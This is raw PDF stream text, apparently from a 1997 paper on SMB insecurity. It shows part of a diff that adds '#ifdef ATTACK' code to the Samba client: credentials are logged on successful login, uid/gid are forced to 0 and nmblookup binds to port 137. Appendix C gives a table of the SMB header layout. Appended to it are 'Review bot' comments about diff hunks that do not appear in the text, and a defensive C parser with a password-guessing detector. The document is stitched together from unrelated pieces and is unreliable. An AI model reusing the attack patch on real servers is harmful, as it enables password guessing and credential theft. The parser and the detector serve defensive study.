0 0 1 54 344.4 Tm ( max_xmit = MIN\(max_xmit,BUFFER_SIZE-4\);) Tj 1 0 0 1 54 333.9 Tm (--- 3336,3341 ----) Tj 1 0 0 1 54 323.4 Tm ( ) Tj 1 0 0 1 54 312.9 Tm (! #ifdef ATTACK) Tj 1 0 0 1 54 302.4 Tm (! /* we're in */) Tj 1 0 0 1 54 291.9 Tm (! DEBUG\(0,\("tcon %s connected as %s/%s\\n", service, username, password\)\);) Tj 1 0 0 1 54 281.4 Tm (! #endif /* ATTACK */) Tj 1 0 0 1 54 270.9 Tm ( max_xmit = MIN\(max_xmit,BUFFER_SIZE-4\);) Tj 1 0 0 1 54 260.4 Tm (***************) Tj 1 0 0 1 54 249.9 Tm (*** 3863,3865 ****) Tj 1 0 0 1 54 239.4 Tm ( receive_smb\(Client,buffer,0\);) Tj 1 0 0 1 54 228.9 Tm (! ) Tj 1 0 0 1 54 218.4 Tm ( #ifdef CLIX) Tj 1 0 0 1 54 207.9 Tm (--- 3985,3991 ----) Tj 1 0 0 1 54 197.4 Tm ( receive_smb\(Client,buffer,0\);) Tj 1 0 0 1 54 186.9 Tm (! #ifdef ATTACK) Tj 1 0 0 1 54 176.4 Tm (! 
/* don't send chkpath-keepalives on a nonexistent tcon */) Tj 1 0 0 1 54 165.9 Tm (! if \(cnum == 0\)) Tj 1 0 0 1 54 155.4 Tm (! continue;) Tj 1 0 0 1 54 144.9 Tm (! #endif /* ATTACK */ ) Tj 1 0 0 1 54 134.4 Tm ( #ifdef CLIX) Tj 1 0 0 1 54 123.9 Tm (***************) Tj 1 0 0 1 54 113.4 Tm (*** 4043,4044 ****) Tj 1 0 0 1 54 102.9 Tm (--- 4169,4177 ----) Tj 1 0 0 1 54 92.4 Tm ( umask\(myumask\);) Tj 1 0 0 1 54 81.9 Tm (+ #ifdef ATTACK) Tj ET Q endstream endobj 194 0 obj 3189 endobj 189 0 obj << /Type /Page /MediaBox [0 0 612 792] /Parent 2 0 R /Resources << /ProcSet [/PDF /Text] /Font << /R192 192 0 R >> >> /Contents [ 190 0 R 193 0 R ] >> endobj 196 0 obj << /Length 197 0 R >> stream q Q q W 54 72 m 558 72 l 558 720 l 54 720 l h n endstream endobj 197 0 obj 48 endobj 198 0 obj << /Type /Font /Name /R198 /Subtype /Type1 /BaseFont /Courier >> endobj 199 0 obj << /Length 200 0 R >> stream BT /R198 10 Tf 1 0 0 1 54 711.9 Tm (+ /* oh, c'mon. */) Tj 1 0 0 1 54 701.4 Tm (+ pid = 2048;) Tj 1 0 0 1 54 690.9 Tm (+ uid = 0;) Tj 1 0 0 1 54 680.4 Tm (+ gid = 0;) Tj 1 0 0 1 54 669.9 Tm (+ mid = 2048;) Tj 1 0 0 1 54 659.4 Tm (+ #endif /* ATTACK */) Tj 1 0 0 1 54 648.9 Tm ( ) Tj 1 0 0 1 54 638.4 Tm (*** nmblookup.c Thu Jan 30 20:52:47 1997) Tj 1 0 0 1 54 627.9 Tm (--- attack/nmblookup.c Tue Jan 21 01:39:16 1997) Tj 1 0 0 1 54 617.4 Tm (***************) Tj 1 0 0 1 54 606.9 Tm (*** 54,56 ****) Tj 1 0 0 1 54 596.4 Tm (--- 54,60 ----) Tj 1 0 0 1 54 585.9 Tm ( ) Tj 1 0 0 1 54 575.4 Tm (+ #ifdef ATTACK) Tj 1 0 0 1 54 564.9 Tm (+ ServerFD = open_socket_in\(SOCK_DGRAM, 137,3\);) Tj 1 0 0 1 54 554.4 Tm (+ #else) Tj 1 0 0 1 54 543.9 Tm ( ServerFD = open_socket_in\(SOCK_DGRAM, 0,3\);) Tj 1 0 0 1 54 533.4 Tm (+ #endif /* ATTACK */) Tj 1 0 0 1 54 522.9 Tm ( ) Tj 1 0 0 1 54 512.4 Tm (***************) Tj 1 0 0 1 54 501.9 Tm (*** 142,144 ****) Tj 1 0 0 1 54 491.4 Tm (--- 146,150 ----) Tj 1 0 0 1 54 480.9 Tm ( strcpy\(scope,optarg\);) Tj 1 0 0 1 54 470.4 Tm (+ #ifndef ATTACK) Tj 1 0 0 1 54 459.9 Tm 
( strupper\(scope\);) Tj 1 0 0 1 54 449.4 Tm (+ #endif /* ATTACK */) Tj 1 0 0 1 54 438.9 Tm ( break;) Tj 1 0 0 1 54 428.4 Tm ( !-- chop --!) Tj 1 0 0 1 54 407.4 Tm (Appendix C: Overview of an SMB packet) Tj 1 0 0 1 54 396.9 Tm (=====================================) Tj 1 0 0 1 54 375.9 Tm (This is [roughly] the structure of an SMB packet as found inside the TCP) Tj 1 0 0 1 54 365.4 Tm (payload and Samba's internal buffers. The leading length integer is not part) Tj 1 0 0 1 54 354.9 Tm (of the SMB proper, and does not always appear under other transport types.) Tj 1 0 0 1 54 344.4 Tm (For further details, see CIFS section 2.4.) Tj 1 0 0 1 54 323.4 Tm (offset name size contents / comments) Tj 1 0 0 1 54 312.9 Tm (~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~) Tj 1 0 0 1 54 302.4 Tm ( 0 [length int.] 4 TCP transport-layer data length) Tj 1 0 0 1 54 291.9 Tm ( 4 header start 4 0xFF, 'S', 'M', 'B') Tj 1 0 0 1 54 281.4 Tm ( 8 SMB command 1 cmd code) Tj 1 0 0 1 54 270.9 Tm ( 9 smb_rcls 2 error class; 0 = no error) Tj 1 0 0 1 54 260.4 Tm (11 smb_err 2 error code ; 0 = no error) Tj 1 0 0 1 54 249.9 Tm (13 smb_flg 1) Tj 1 0 0 1 54 239.4 Tm (14 smb_flg2 2) Tj 1 0 0 1 54 228.9 Tm (16 [filler] 12) Tj 1 0 0 1 54 218.4 Tm (28 TID 2) Tj 1 0 0 1 54 207.9 Tm (30 PID 2) Tj 1 0 0 1 54 197.4 Tm (32 UID 2) Tj 1 0 0 1 54 186.9 Tm (34 MID 2) Tj 1 0 0 1 54 176.4 Tm (36 word count 1 number of following parameter words) Tj 1 0 0 1 54 165.9 Tm (37 smb_vwv0 2 0x00FF [intel order] if no AndX cmd) Tj 1 0 0 1 54 155.4 Tm (39 smb_vwv1 2 0x0000 if no batched AndX stuff) Tj 1 0 0 1 54 144.9 Tm (41 smb_vwv2 2 ...) Tj 1 0 0 1 54 134.4 Tm ( ... to a variable length's worth ...) Tj 1 0 0 1 54 123.9 Tm (?? buffers * smb_buf\(\) finds this offset) Tj 1 0 0 1 54 113.4 Tm ( ... SMB ends at \(TCP-len + 4\) ...) 
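Review bot: in the `*** 80,81` hunk of client.c, the interpret_error block comment and the code disagree on what return value 5 means. The header lists "5 network-ID not found, for session", but the only mapping to 5 is `if (err == 5) return (5); /* invalid TID */` under ERRSRV, and a TID belongs to a tree connect rather than a session; reword the header or move the case so a caller testing for 5 gets what the comment promises. The `/* XXX: the rest of these might be ERRSRVs too */` line likewise leaves the ERRDOS 2240 through 2455 cases unverified and should be settled against the spec before anything depends on them.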
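Review bot: in the `*** 171,172` hunk, `SSVAL(outbuf,smb_flg2,0x2001); /* execute perm == read perm [?] */` overwrites the `0x1` stored on the context line just above it with a bit whose meaning the `[?]` admits is unknown, and `SCVAL(outbuf,smb_flg,0x18)` gets only a five-word comment. Name the flags and flags2 bits from the CIFS spec in the comments so the reader can judge what the server is being told.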
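Review bot: the `*** 3129,3130` and `*** 3217,3219` hunks write the accepted password in clear at debug level 0 (`DEBUG(0,("session established as %s/%s\n", username, password));` and the matching tcon line), so it lands in the default output next to everything else and anyone retaining that output is retaining credentials. Log the username and service only, or put the password behind a higher debug level.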
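An added example, not code from the paper or from Samba: a bounds-checked parser for the header layout in the table above, using its offsets directly, plus a check that classifies a response as a rejected credential the way the patch's interpret_error() does for its "2" bucket. Assumptions not in the table: the ERRDOS/ERRSRV class values (1 and 2), the 2-byte byte count that follows the parameter words, and the constructed sample reply.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Absolute offsets from the Appendix C table (bytes 0..3 are the transport
   length), so they match the numbers behind Samba's smb_* names. */
enum { SMB_MAGIC = 4, SMB_COM = 8, SMB_RCLS = 9, SMB_ERR = 11, SMB_FLG = 13,
       SMB_FLG2 = 14, SMB_TID = 28, SMB_PID = 30, SMB_UID = 32, SMB_MID = 34,
       SMB_WCT = 36, SMB_VWV = 37 };
/* SMB error classes; fixed by CIFS, not listed in the table. */
enum { ERRDOS = 0x01, ERRSRV = 0x02 };

struct smb_hdr {
    size_t   end;        /* where the SMB ends: transport length + 4 */
    size_t   buf_off;    /* start of the byte block, what smb_buf() returns */
    uint8_t  cmd, rcls, flg, wct;
    uint16_t err, flg2, tid, pid, uid, mid, bcc;
};

static uint16_t le16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }

/* Parse one SMB inside a NetBIOS session message.  Every length the packet
   asserts about itself (transport length, word count, byte count) is checked
   against what was actually received before any field is trusted.
   Returns 0 on success or a negative code naming the first failed check. */
int smb_parse(const uint8_t *pkt, size_t len, struct smb_hdr *h)
{
    static const uint8_t magic[4] = { 0xFF, 'S', 'M', 'B' };
    if (len < SMB_VWV) return -1;                        /* too short for a header */
    if (pkt[0] != 0x00) return -2;                       /* not a session message */
    h->end = 4 + (((size_t)pkt[1] << 16) | ((size_t)pkt[2] << 8) | pkt[3]);
    if (h->end > len) return -3;                         /* claims more than we hold */
    if (memcmp(pkt + SMB_MAGIC, magic, 4) != 0) return -4;
    h->cmd = pkt[SMB_COM];  h->rcls = pkt[SMB_RCLS];  h->err = le16(pkt + SMB_ERR);
    h->flg = pkt[SMB_FLG];  h->flg2 = le16(pkt + SMB_FLG2);
    h->tid = le16(pkt + SMB_TID);  h->pid = le16(pkt + SMB_PID);
    h->uid = le16(pkt + SMB_UID);  h->mid = le16(pkt + SMB_MID);
    h->wct = pkt[SMB_WCT];
    size_t bcc_off = SMB_VWV + 2 * (size_t)h->wct;       /* byte count follows the words */
    if (bcc_off + 2 > h->end) return -5;                 /* word count overruns the SMB */
    h->bcc = le16(pkt + bcc_off);
    h->buf_off = bcc_off + 2;
    if (h->buf_off + h->bcc > h->end) return -6;         /* byte count overruns the SMB */
    return 0;
}

/* The responses the patch's interpret_error() collapses into its "2" bucket:
   credentials rejected for the session or the share.  Counted per source
   address, a run of these is the server-side trace of password guessing. */
int smb_is_auth_failure(const struct smb_hdr *h)
{
    if (h->rcls == ERRSRV && h->err == 2) return 1;                   /* bad name or password */
    if (h->rcls == ERRDOS && (h->err == 5 || h->err == 86)) return 1; /* access denied, bad net password */
    return 0;
}

/* Constructed sample, not a capture: a SessionSetupAndX (0x73) reply carrying
   ERRSRV/2 with zero parameter words and zero data bytes. */
const uint8_t sample_bad_password[39] = {
    0x00, 0x00, 0x00, 0x23,                          /* session message, 35 bytes follow */
    0xFF, 'S', 'M', 'B', 0x73,                       /* magic, command */
    0x02, 0x00, 0x02, 0x00,                          /* rcls = ERRSRV, reserved, err = 2 */
    0x80, 0x01, 0x00,                                /* flg (reply bit), flg2 */
    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,              /* 12 filler bytes */
    0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x08,  /* TID, PID, UID, MID (little-endian) */
    0x00,                                            /* word count */
    0x00, 0x00                                       /* byte count */
};
```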
_H* 970130